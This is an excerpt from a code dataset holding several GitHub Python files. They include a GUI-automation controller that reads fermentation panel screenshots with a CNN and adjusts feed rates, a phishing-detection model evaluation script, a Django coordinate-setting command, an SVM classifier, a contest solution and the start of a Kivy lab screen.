core_init(0.1)\n \n result = (G-15)**2 + 50*(1/(P+1))**2\n \n\n\n return result\n\ndef data_loading():\n \n global train_x\n global train_y\n global test_x\n global test_y\n global proof_x\n global proof_y\n global core_1_minMax_input\n global core_1_minMax_output\n global core_2_minMax_input\n global core_2_minMax_output\n \n \n data = np.array(pd.read_excel('data_new.xlsx'))\n\n x = data[:,0:5] # without T\n y = data[:,6:8]\n \n \n core_1_minMax_input = MinMaxScaler()\n \n core_1_minMax_input.fit(x)\n \n \n \n core_1_minMax_output = MinMaxScaler()\n \n core_1_minMax_output.fit(y)\n \n\n\n data = np.array(pd.read_excel('data_new_new.xlsx'))\n \n x = data[:,0:4] # without T\n y = data[:,5:7]\n \n core_2_minMax_input = MinMaxScaler()\n \n core_2_minMax_input.fit(x)\n \n \n core_2_minMax_output = MinMaxScaler()\n \n core_2_minMax_output.fit(y)\n \n\n\ndef core_init(drop_out_rate):\n \n global core_net\n # global core\n \n class core(nn.Module):\n \n def __init__(self):\n \n super(core, self).__init__()\n \n self.layer1 = nn.Linear(5, 60)\n \n self.layer2 = nn.Linear(60, 60)\n \n self.layer3 = nn.Linear(60, 60)\n \n self.layer4 = nn.Linear(60, 60)\n \n self.layer5 = nn.Linear(60, 60)\n \n self.layer6 = nn.Linear(60, 60)\n \n self.layer7 = nn.Linear(60, 60)\n \n self.layer8 = nn.Linear(60, 60)\n\n self.layer9 = nn.Linear(60, 2)\n \n \n def forward(self, x):\n \n x1 = F.relu(self.layer1(x))\n \n x2 = F.relu(self.layer2(x1))\n \n x3 = F.relu(self.layer3(x2))\n \n x4 = F.relu(self.layer4(x3))\n \n x5 = F.relu(self.layer5(x4))\n \n x6 = F.relu(self.layer6(x5))\n \n x7 = F.relu(self.layer7(x6))\n \n x8 = F.relu(self.layer8(x7))\n\n \n \n output = self.layer9(x8) \n \n return output\n\n \n core_net = core()\n\n core_net.load_state_dict(torch.load(path + '\\\\final_core.pth.tar', map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return core_net\n\n\n\n\ndef core_init2():\n \n global core_net2\n # global core2\n \n \n class core2(nn.Module):\n \n def __init__(self):\n super(core2, self).__init__()\n \n self.layer1 = nn.Linear(4, 80)\n \n self.layer2 = nn.Linear(80, 80)\n \n self.layer3 = nn.Linear(80, 80)\n \n self.layer4 = nn.Linear(80, 80)\n \n self.layer5 = nn.Linear(80, 2)\n \n \n def forward(self, x):\n \n x1 = F.relu(self.layer1(x))\n \n x2 = F.relu(self.layer2(x1))\n \n x3 = F.relu(self.layer3(x2))\n \n x4 = F.relu(self.layer4(x3))\n \n output = self.layer5(x4) \n \n return output\n\n \n core_net2 = core2()\n\n core_net2.load_state_dict(torch.load(path + '\\\\final_core2.pth.tar', map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return core_net2\n\nclass CNN(nn.Module):\n\n def __init__(self):\n\n super(CNN, self).__init__()\n\n self.conv1 = nn.Sequential(nn.Conv2d(in_channels=1, out_channels=16, kernel_size=5, stride=1, padding=2,),\n nn.ReLU(), nn.MaxPool2d(kernel_size=2),)\n\n self.conv2 = nn.Sequential(nn.Conv2d(16, 32, 5, 1, 2), nn.ReLU(), nn.MaxPool2d(2),)\n\n self.out = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n\n x = self.conv1(x)\n\n x = self.conv2(x)\n\n x = x.view(x.size(0), -1)\n\n output = self.out(x)\n\n return output\n\ndef cnn_init():\n \n global cnn_net\n \n cnn_net = CNN()\n \n cnn_net.load_state_dict(torch.load( path + '\\\\final_mnist.pth.tar',map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return cnn_net\n \n\ndef img_reading_gray(path):\n \n img = cv2.imread(path)\n \n gray_img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n \n return gray_img\n\n\ndef img_bindary(img,trend=60):\n \n _ , bindary_gray = cv2.threshold( img , trend, 255, cv2.THRESH_BINARY)\n \n return bindary_gray\n\n\ndef on_off_check(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[284, 300],\n 'baset':[331, 348],\n 'folet':[379, 396],\n 'subst':[428, 444],\n \n }\n \n function_table_y = {\n \n 'acid':[160, 201],\n 'baset':[162, 201],\n 'folet':[162, 201],\n 'subst':[162, 201],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area\n \n \ndef speed_img_get(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[284, 300],\n 'baset':[331, 348],\n 'folet':[379, 396],\n 'subst':[427, 444],\n \n }\n\n function_table_y = {\n \n 'acid':[160, 182],\n 'baset':[160, 181],\n 'folet':[162, 181],\n 'subst':[160, 181],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area \n\ndef counter_img_get(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[301, 326],\n 'baset':[349, 373],\n 'folet':[397, 422],\n 'subst':[445, 470],\n 'stirr':[120, 145],\n 'temp':[206, 229],\n 'ph':[253, 277],\n \n }\n \n function_table_y = {\n \n 'acid':[65, 114],\n 'baset':[65, 115],\n 'folet':[65, 115],\n 'subst':[65, 115],\n 'stirr':[564, 605],\n 'temp':[661, 697],\n 'ph':[660, 698],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area\n\ndef area_divid_cnn_check(area, ):\n \n plt.imshow(area)\n plt.show()\n \n # global cut_y_direaction\n # global bound_y_begin\n # global bound_y_end\n \n bound_y_begin = []\n bound_y_end = []\n \n mark = 0\n \n for i in range(area.shape[1]):\n \n if mark == 0:\n \n if False in (area[:,i] == 255):\n \n bound_y_begin.append(i)\n \n mark = 1\n \n else:\n \n if not(False in (area[:,i] == 255)):\n \n bound_y_end.append(i)\n \n mark = 0\n \n if len(bound_y_begin) != len(bound_y_end):\n \n bound_y_end.append(i)\n \n \n cut_y_direaction = []\n \n # avoiding the edge\n \n for i in range(len(bound_y_begin)):\n \n cut_y_direaction.append(area[:,bound_y_begin[i]:bound_y_end[i]])\n \n \n cut_final = []\n \n for i in cut_y_direaction:\n \n bound_x_begin = []\n bound_x_end = []\n \n mark = 0\n \n for j in range(i.shape[0]):\n \n if mark == 0:\n \n if False in (i[j,:] == 255):\n \n bound_x_begin.append(j)\n \n mark = 1\n \n elif mark == 1:\n \n if not(False in (i[j,:] == 255)):\n \n bound_x_end.append(j)\n \n mark = 0\n \n\n \n for j in range(len(bound_x_begin)):\n \n cut_final.append(i[bound_x_begin[j]:bound_x_end[j],:])\n\n cnn_check = []\n\n real_number = []\n \n for i in cut_final:\n \n if i.shape[0] < 3 and i.shape[1] < 3:\n \n cnn_check.append(0)\n \n real_number.append('.')\n \n else:\n \n cnn_check.append(1)\n \n real_number.append('fuck')\n \n \n return cut_final, cnn_check, real_number\n \n\ndef padding_28_28(img):\n \n img = -img + 255\n \n final_img = np.zeros([28,28],dtype='uint8')\n \n a = img.shape[0]\n \n b = img.shape[1]\n \n \n if a >= b:\n \n img_resize = cv2.resize(img, (int((20/a)*b),20))\n \n final_img[int(final_img.shape[0]/2-img_resize.shape[0]/2):int(final_img.shape[0]/2-img_resize.shape[0]/2) + img_resize.shape[0], \n int(final_img.shape[1]/2-img_resize.shape[1]/2):int(final_img.shape[1]/2-img_resize.shape[1]/2) + img_resize.shape[1]] = img_resize\n \n elif a < b:\n \n img_resize = cv2.resize(img, (20,int((20/b)*a)))\n \n final_img[int(final_img.shape[0]/2-img_resize.shape[0]/2):int(final_img.shape[0]/2-img_resize.shape[0]/2) + img_resize.shape[0],\n int(final_img.shape[1]/2-img_resize.shape[1]/2):int(final_img.shape[1]/2-img_resize.shape[1]/2) + img_resize.shape[1]] = img_resize\n \n \n return final_img/255\n\n\n\ndef mnist(net,img_list, cnn_check, real_number):\n \n # global mnist_img\n \n mnist_img = []\n \n for i in range(len(cnn_check)):\n \n if cnn_check[i] == 1:\n \n mnist_img.append(padding_28_28(img_list[i]))\n \n mnist_img = torch.Tensor(np.array(mnist_img)).unsqueeze(dim=1)\n \n predict_result = torch.max(net(mnist_img),1)[1].numpy().tolist()\n \n for i in range(len(cnn_check)):\n \n if cnn_check[i] == 1:\n \n real_number[i] = str(predict_result[0])\n \n del predict_result[0]\n \n number = ''\n \n for i in real_number:\n \n number += i\n \n number = float(number)\n \n return number\n \ndef rt_speed_reading(net, path, function):\n \n mm = area_divid_cnn_check(img_bindary(speed_img_get(img_reading_gray(path),function)))\n \n num = mnist(net,mm[0],mm[1],mm[2])\n \n return num\n\n\ndef rt_counter_reading(net, path, function):\n \n # global mm\n \n # Bug_repairing\n \n mm = area_divid_cnn_check(img_bindary(counter_img_get(img_reading_gray(path),function)))\n \n num = mnist(net,mm[0],mm[1],mm[2])\n \n return num\n\ndef off_line(path,function):\n \n os.chdir(path)\n \n files = os.listdir()\n \n files.sort()\n \n data = []\n \n for i in files:\n \n data.append(rt_counter_reading(i, function))\n \n plt.plot(data)\n \n plt.show()\n \n return np.array(data)\n\n\n\ndef get_hwnd():\n \n \n handle_left = 0\n \n handle_right = 0\n \n right = 'PC-Panel 礑CU - right - 10.50.131.37 [full access]'\n\n left = 'PC-Panel 礑CU - left - 10.50.129.29 [full access]'\n\n hwnd_title = dict()\n \n def get_all_hwnd(hwnd,mouse):\n \n if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):\n \n hwnd_title.update({hwnd:win32gui.GetWindowText(hwnd)})\n \n win32gui.EnumWindows(get_all_hwnd, 0)\n \n \n for h,t in hwnd_title.items():\n \n if t != \"\":\n \n # print(h, t)\n \n if t == right:\n \n handle_right = h\n \n if t == left:\n \n handle_left = h\n \n \n return handle_left, handle_right\n\ndef show_postion(hwnd):\n \n rect = win32gui.GetWindowRect(hwnd)\n \n x = rect[0]\n \n y = rect[1]\n \n w = rect[2] - x\n \n h = rect[3] - y\n \n print(\"Window %s:\" % win32gui.GetWindowText(hwnd))\n \n print(\"\\tLocation: (%d, %d)\" % (x, y))\n \n print(\"\\t Size: (%d, %d)\" % (w, h))\n \n return x,y\n\ndef recover_position():\n \n handle_left, handle_right = get_hwnd()\n \n left_x, left_y = show_postion(handle_left)\n \n right_x, right_y = show_postion(handle_right)\n \n # left\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle_left)\n \n click_position_x = left_x + 400\n \n click_position_y = left_y + 10\n \n pyautogui.moveTo(click_position_x, click_position_y, duration = 0.5)\n \n pyautogui.mouseDown()\n \n pyautogui.moveRel(-left_x, -left_y, duration = 2)\n \n pyautogui.mouseUp()\n\n #right\n \n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%')\n \n win32gui.SetForegroundWindow(handle_right)\n \n click_position_x = right_x + 400\n \n click_position_y = right_y + 10\n \n pyautogui.moveTo(click_position_x, click_position_y, duration = 0.5)\n \n pyautogui.mouseDown()\n \n pyautogui.moveRel(-right_x, -right_y, duration = 2)\n \n pyautogui.mouseUp()\n\n\n\ndef control_panel_location(handle):\n \n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n x, y = show_postion(handle)\n \n control_panel_x = x + 20\n \n control_panel_y = y + 600\n \n pyautogui.moveTo(control_panel_x, control_panel_y, duration = 0.5)\n \n pyautogui.click()\n \n \ndef trend_plot_location(handle):\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n x, y = show_postion(handle)\n \n trend_plot_x = x + 150\n \n trend_plot_y = y + 600\n \n pyautogui.moveTo(trend_plot_x, trend_plot_y, duration = 0.5)\n \n pyautogui.click()\n\ndef screen(time,handle,ID):\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n hwnd = handle\n \n app = QApplication(sys.argv)\n \n screen = QApplication.primaryScreen()\n \n img = screen.grabWindow(hwnd).toImage()\n \n img.save(str(time)+ '_' + ID + \".jpg\")\n\n\ndef function_click(handle, function):\n \n #without edge\n \n function_table = {\n \n 'acid':[44, 297],\n 'baset':[39, 354],\n 'folet':[36, 398],\n 'subst':[45, 446],\n 'stirr':[537, 126],\n 'temp':[756, 206],\n 'ph':[755, 252],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + 3 + function_table[function][0], y + 25 + function_table[function][1], duration = 0.5)\n \n pyautogui.click()\n \n \ndef switch_click(handle, function):\n \n #without edge\n \n switch_table = {\n \n 'acid':[177, 290],\n 'baset':[178, 339],\n 'folet':[179, 387],\n 'subst':[176, 434],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + 3 + switch_table[function][0], y + 25 + switch_table[function][1], duration = 0.5)\n \n pyautogui.click()\n\n \ndef switch_on_off_auto(handle, state):\n \n #with edge\n \n on_off_table = {\n \n 'off':[357, 279],\n 'on':[358, 334],\n 'auto':[358, 386],\n 'ok':[446, 467],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + on_off_table[state][0], y + on_off_table[state][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + on_off_table['ok'][0], y + on_off_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n \ndef number_panel(handle, num):\n \n #with edge\n \n number_table = {\n \n \n '0':[316, 427],\n '1':[267, 374],\n '2':[313, 378],\n '3':[362, 377],\n '4':[267, 325],\n '5':[314, 327],\n '6':[363, 328],\n '7':[267, 276],\n '8':[316, 274],\n '9':[365, 275],\n '.':[363, 426],\n 'ok':[538, 483] \n\n }\n \n x, y = show_postion(handle)\n \n number = str(num)\n \n for i in number:\n \n pyautogui.moveTo(x + number_table[i][0], y + number_table[i][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + number_table['ok'][0], y + number_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n\n \ndef number_panel_on_off_auto(handle, state):\n \n #with edge\n \n on_off_table = {\n \n 'on':[443, 275],\n 'off':[446, 335],\n 'auto':[442, 375],\n 'ok':[542, 486],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + on_off_table[state][0], y + on_off_table[state][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + on_off_table['ok'][0], y + on_off_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n\ndef main(LGHPLC0, RGHPLC0,LOD0, ROD0):\n \n # init\n \n global path\n \n global Time_points\n \n global L_B\n global L_G\n \n global R_B\n global R_G\n \n global LX0\n global LX1\n global LX2\n global LX3\n global LX4\n \n global RX0\n global RX1\n global RX2\n global RX3\n global RX4\n \n global begin_feed_L\n global begin_feed_R\n \n global goal_L\n global goal_R\n \n global Now_G_L_Rate\n global Now_G_R_Rate\n \n global handle_left\n global handle_right\n \n Now_G_L_Rate = 10\n \n Now_G_R_Rate = 10\n \n path = os.getcwd()\n \n Time_points = []\n \n L_B = []\n \n L_G = []\n \n R_B = []\n \n R_G = []\n \n begin_feed_L = 0\n \n begin_feed_R = 0\n \n cnn_init()\n \n core_init(0)\n \n core_init2()\n \n time_resoliton = 10 #unit:min\n \n # working flow\n \n handle_left, handle_right = get_hwnd()\n \n start_time = int(time.time())\n \n os.chdir('Chonpca')\n \n os.mkdir(str(start_time))\n \n os.chdir(str(start_time))\n \n start_time = int(time.time())\n \n recover_position()\n \n \n control_panel_location(handle_right)\n \n screen(start_time,handle_right,'right_control')\n \n trend_plot_location(handle_right)\n \n screen(start_time,handle_right,'right_trend')\n \n control_panel_location(handle_right)\n \n \n control_panel_location(handle_left)\n \n screen(start_time,handle_left,'left_control')\n \n trend_plot_location(handle_left)\n \n screen(start_time,handle_left,'left_trend')\n \n control_panel_location(handle_left)\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n Time_points.append(start_time)\n \n LX0 = LGHPLC0\n\n LX1 = rt_counter_reading(cnn_net, str(start_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = rt_counter_reading(cnn_net, str(start_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n \n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(start_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(start_time) + '_right_control.jpg', 'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n \n # data upload\n \n while True:\n \n # recording\n \n now_time = int(time.time())\n \n if (now_time - start_time)%60 == 0:\n \n handle_left, handle_right = get_hwnd()\n \n recover_position()\n \n \n control_panel_location(handle_right)\n \n screen(now_time,handle_right,'right_control')\n \n trend_plot_location(handle_right)\n \n screen(now_time,handle_right,'right_trend')\n \n control_panel_location(handle_right)\n \n \n control_panel_location(handle_left)\n \n screen(now_time,handle_left,'left_control')\n \n trend_plot_location(handle_left)\n \n screen(now_time,handle_left,'left_trend')\n \n control_panel_location(handle_left)\n \n # data_collect\n \n if (now_time - start_time) <= 3700:\n \n # BEFORE 1H\n \n \n Time_points.append(now_time)\n \n LX0 = LGHPLC0\n \n LX1 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n\n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n\n \n else:\n \n # after 1H\n\n LX0 = LGHPLC0\n \n LX1 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n \n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n \n \n # X4_calculate\n \n files = os.listdir()\n \n file_exit_L = 0\n \n file_exit_R = 0\n \n for i in range(10):\n \n if file_exit_L == 0:\n \n L_file_T_minus_1 = str(now_time - 3600 - i*60) + '_left_control.jpg'\n \n \n if L_file_T_minus_1 in files:\n \n file_exit_L = 1\n \n LX3_T_minus_1 = rt_counter_reading(cnn_net, L_file_T_minus_1, 'baset')*1\n \n LX4 = LX3 - LX3_T_minus_1\n \n if file_exit_R == 0:\n \n R_file_T_minus_1 = str(now_time - 3600 - i*60) + '_right_control.jpg'\n \n if R_file_T_minus_1 in files:\n \n file_exit_R = 1\n \n RX3_T_minus_1 = rt_counter_reading(cnn_net, R_file_T_minus_1, 'baset')*(31/50)\n \n RX4 = RX3 - RX3_T_minus_1\n \n # control \n\n if begin_feed_R == 0:\n \n if (now_time - start_time) > 4000:\n\n tmp_xx = np.array([[RX0,ROD0,RX3,RX4]])\n\n tmp_xx = core_2_minMax_input.transform(tmp_xx)\n \n tmp_xx = torch.Tensor(tmp_xx)\n \n tmp_xx = torch.unsqueeze(tmp_xx,dim=1)\n \n yy = core_net2(tmp_xx).detach().numpy()\n \n RRX4 = core_2_minMax_output.inverse_transform(np.array([[yy[0,0,0],yy[0,0,1]]]))[0,0]\n \n if RRX4 < 15:\n \n begin_feed_R = 1\n \n control_panel_location(handle_right)\n \n function_click(handle_right, 'subst')\n \n number_panel(handle_right, '10')\n \n if begin_feed_R == 1:\n \n if (now_time - start_time)%600 == 0:\n \n RX0 = RX0\n \n RX1 = RX1\n \n RX2 = RX1 + (Now_G_R_Rate*5)*(62/30)\n \n RX3 = RX3\n \n RX4 = RX4\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n aaa = opt_R()\n \n Now_G_R_Rate = aaa[0][0]\n \n control_panel_location(handle_right)\n \n function_click(handle_right, 'subst')\n \n number_panel(handle_right,str(Now_G_R_Rate)[0:4])\n\n\n\n \n if begin_feed_L == 0:\n \n if (now_time - start_time) > 4000:\n \n tmp_xx = np.array([[LX0,LOD0,LX3,LX4]])\n \n tmp_xx = core_2_minMax_input.transform(tmp_xx)\n \n tmp_xx = torch.Tensor(tmp_xx)\n \n tmp_xx = torch.unsqueeze(tmp_xx,dim=1)\n \n yy = core_net2(tmp_xx).detach().numpy()\n\n LLX4 = core_2_minMax_output.inverse_transform(np.array([[yy[0,0,0],yy[0,0,1]]]))[0,0]\n \n if LLX4 < 15:\n \n begin_feed_L = 1\n \n control_panel_location(handle_left)\n \n function_click(handle_left, 'subst')\n \n number_panel(handle_left, '10')\n \n if begin_feed_L == 1:\n \n if (now_time - start_time) % (time_resoliton*60) == 0:\n \n LX0 = LX0\n \n LX1 = LX1\n \n LX2 = LX1 + (Now_G_L_Rate*5)*2.1\n \n LX3 = LX3\n \n LX4 = LX4\n \n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n aaa = opt_L()\n \n Now_G_L_Rate = aaa[0][0]\n \n control_panel_location(handle_left)\n \n function_click(handle_left, 'subst')\n \n number_panel(handle_left,str(Now_G_L_Rate)[0:4])\n \n \n\n\n\ndata_loading()\n\nmain(44,44,0.290,0.242)","repo_name":"JChonpca/AI_Fed_Batch_Fermentation","sub_path":"ai-fb.py","file_name":"ai-fb.py","file_ext":"py","file_size_in_byte":30463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40561039848","text":"# This file is to test the performance of the saved model\n\n\n# Start timer\nimport time\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\nstartTime = current_milli_time()\n\n\n\n# Load the dataset\nimport pandas\nimport numpy as np\n\ndataset = pandas.read_csv('dataset/dataset.csv')\n\n\n\n# Split Data\nfrom sklearn.model_selection import train_test_split\narray = dataset.values\nX = array[:,0:15]\nY = array[:,15]\nval_size = 0.2\nseed=7\nX_train, X_val, Y_train, Y_val = train_test_split(X,Y, test_size=val_size, random_state=seed)\n\n\n\nimport joblib\nmodel = joblib.load('final_models/decision_tree.pkl')\n# Model Evaluation\nfrom sklearn import metrics\npredictions = model.predict(X_val)\nprint(metrics.accuracy_score(Y_val, predictions))\nprint(metrics.confusion_matrix(Y_val, predictions))\nprint(metrics.classification_report(Y_val, predictions))","repo_name":"rayyue300/phishing-webpage-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70742494249","text":"import re\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.core.management import BaseCommand\n\nfrom accounts.models import get_account\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n \"\"\"Set coordinates value, from latitude and longitude values\"\"\"\n args = ''\n help = 'Set coordinates with provided lat and long values'\n\n def handle(self, *args, **options):\n # first, ask for user identifier, and get it\n while True:\n identifier = input('Please indicate id or email of user to handle')\n if identifier.isnumeric() or re.match(r'.{2,}@.{2,}\\..{2,}', identifier):\n break\n else:\n self.stdout.write('Wrong value. Please, provide id or email of user.\\n')\n self.stdout.flush()\n if identifier.isnumeric():\n try:\n user = User.objects.get(id=identifier)\n except User.DoesNotExist:\n self.stdout.write('No User with provided id')\n exit()\n else:\n try:\n user = User.objects.get(email=identifier)\n except User.DoesNotExist:\n self.stdout.write('No User with provided email')\n exit()\n # second, ask for coordinates\n latitude = None\n while latitude is None:\n try:\n latitude = float(input('Please, provide latitude: '))\n except ValueError:\n self.stdout.write('Please, provide a valid float number\\n')\n longitude = None\n while longitude is None:\n try:\n longitude = float(input('Please, provide longitude: '))\n except ValueError:\n self.stdout.write('Please, provide a valid float number\\n')\n\n account = get_account(user)\n account.coordinates = Point(longitude, latitude, srid=4326)\n account.save()\n self.stdout.write('Coordinates were stored successfully')\n","repo_name":"iamvane/nabi_api_django","sub_path":"accounts/management/commands/set_coordinates.py","file_name":"set_coordinates.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74131907369","text":"from sklearn import svm\r\nimport numpy as np\r\nimport os, pickle\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfeatures = np.load('featuredExtract.npy')\r\n\r\ny_train = np.load('y_train.npy')\r\ny_test = np.load('y_test.npy')\r\n\r\nx_train = features[:30]\r\nx_test = features[30:]\r\n\r\n# clf = svm.SVC(gamma='auto')\r\n\r\nclf = LinearSVC(C=1.0, class_weight=None, dual=True, fit_intercept=True,\r\n intercept_scaling=1, loss='squared_hinge', max_iter=10000,\r\n multi_class='ovr', penalty='l2', random_state=0, tol=1e-05, verbose=0)\r\nclf.fit(x_train, y_train)\r\nprint(clf.coef_)\r\nprint(clf.intercept_)\r\npickle.dump(clf,open('modelSVM.pkl','wb'))\r\n\r\ntest_predict_Y= clf.predict(x_test)\r\nprint(test_predict_Y)\r\nprint('Accurancy: {}'.format(accuracy_score(y_test,test_predict_Y)))\r\n# print(result)\r\n# pickle.dump(result,open('result.pkl','wb'))\r\n# clf = pickle.load(open('modelSVM.pkl','rb'))\r\n","repo_name":"ducanhvina17/SVM","sub_path":"SVM_classification.py","file_name":"SVM_classification.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31626175298","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\na = tuple(map(int,input().split()))\n\nif(n <= 3):\n print(max(a))\n exit()\n\nleft = [0] * (n+1)\nright = [0] * (n+1)\n\nleft[1] = a[0]\nleft[2] = max(a[0],a[1])\nfor i in range(3,n+1):\n if(i%2==0):\n left[i] = max(left[i-3] + max(a[i-2], a[i-1]),\n left[i-2] + a[i-1])\n else:\n left[i] = left[i-2] + a[i-1]\n\nright[-2] = a[-1]\nright[-3] = max(a[-1],a[-2])\nfor i in range(n-3,-1,-1):\n if((n-i)%2==0):\n right[i] = max(right[i+3] + max(a[i+1], a[i]),\n right[i+2] + a[i])\n else:\n right[i] = right[i+2] + a[i]\n\nans = left[-2]\nfor i in range(0,n-1 ):\n ans = max(ans, left[i] + right[i+2])\n\nif(n%2==0):\n print(left[-1])\nelse:\n print(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc162/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8704800971","text":"from kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.textinput import TextInput\n\n\nclass LaborantScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n gridlayout = GridLayout(cols=3, row_force_default=True, row_default_height=40, col_default_width = 200)\n gridlayout.add_widget(Label(text=\"Рабочее место лаборанта\",size_hint=[1, 0.1]))\n gridlayout.add_widget((Button(text='Заявка на изменение расписания',on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n gridlayout.add_widget((Button(text='Перенести пару', on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n gridlayout.add_widget((Button(text='Заменить преподавателя', on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n self.add_widget(gridlayout)\n\n bottommenu = BoxLayout(orientation = 'horizontal',size_hint=(1, .15))\n bottommenu.add_widget(Button(text='Выход', on_press=self.BUTTON_exit, size_hint=(.5, 1)))\n bottommenu.add_widget((Button(text='', disabled = True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n self.add_widget(bottommenu)\n\n def BUTTON_Message(self,*args):\n popup = Popup(title='Сообщение',content=TextInput(text=('Данный функционал в разработке'), multiline=True),size_hint=(None, None), size=(200, 200))\n popup.open()\n\n def BUTTON_exit(self,*args):\n self.manager.transition.direction = 'right'\n self.manager.current = 